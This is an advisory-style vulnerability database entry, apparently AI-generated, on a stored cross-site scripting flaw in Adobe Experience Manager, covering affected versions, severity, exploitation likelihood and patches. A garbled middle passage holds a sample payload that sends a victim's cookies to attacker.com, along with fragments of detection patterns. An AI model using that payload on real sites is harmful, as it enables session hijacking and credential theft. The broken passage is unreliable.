
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-75741 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields. When a victim browses to a page containing the affected field, the injected JavaScript executes in their browser. Affected versions include AEM 6.5 through 6.5.24, AEM 6.5 LTS through SP2, and AEM as a Cloud Service through 2026.7.0. The vulnerability was disclosed and patched on September 8, 2026, with a CVSS v3.1 base score of 5.4 (Medium) (Adobe Advisory, GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) variant. Insufficient input validation and output encoding in AEM form fields allows attacker-supplied content to be stored server-side and later rendered as executable JavaScript in other users' browsers. Exploitation requires network access, low privileges (an authenticated account), and user interaction (a victim must visit the affected page). The scope change indicator reflects that the injected script executes in the security context of the victim's browser session, crossing the boundary of the vulnerable component (Adobe Advisory, GitHub Advisory).
Successful exploitation enables an attacker to execute arbitrary JavaScript in the browsers of users who view pages containing the malicious payload, potentially leading to session hijacking, credential theft, phishing, or unauthorized actions performed on behalf of victims. Confidentiality and integrity are both partially impacted, while availability is unaffected. Because the scope is changed, the impact extends beyond the vulnerable AEM component to affect end users' browser sessions and any data accessible within those sessions (Adobe Advisory, GitHub Advisory).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the time of disclosure. The EPSS score is approximately 0.27%, placing it in the 20th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, and NVD's SSVC assessment classifies exploitation as "none" and the attack as non-automatable (GitHub Advisory, Adobe Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable form field and save or publish the content.%3Cscript%3E, javascript:, onerror=) in form field parameters.<script> tags or event handler attributes into page content.Adobe released patches on September 8, 2026, addressing this vulnerability. Users should upgrade to the following fixed versions: AEM 6.5 to version 6.5.25.0 or later, AEM 6.5 LTS to SP3 or later, and AEM as a Cloud Service to the 2026.8.0 release or later. As interim mitigations, administrators should implement strict input validation and output encoding for all form fields, deploy Content Security Policy (CSP) headers to restrict unauthorized script execution, and limit write access to form fields that are rendered to other users (Adobe Advisory).
The CIS (Center for Internet Security) published an advisory noting multiple vulnerabilities in Adobe products patched in September 2026, including this XSS issue. Tenable released detection plugins (Nessus plugin 344294) for the vulnerability. Coverage was also noted by security aggregators including BeyondMachines and Fortress SRM in their September 2026 threat roundups. No significant researcher commentary or social media discussion specific to this CVE has been identified, consistent with its medium severity and lack of public exploit code.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."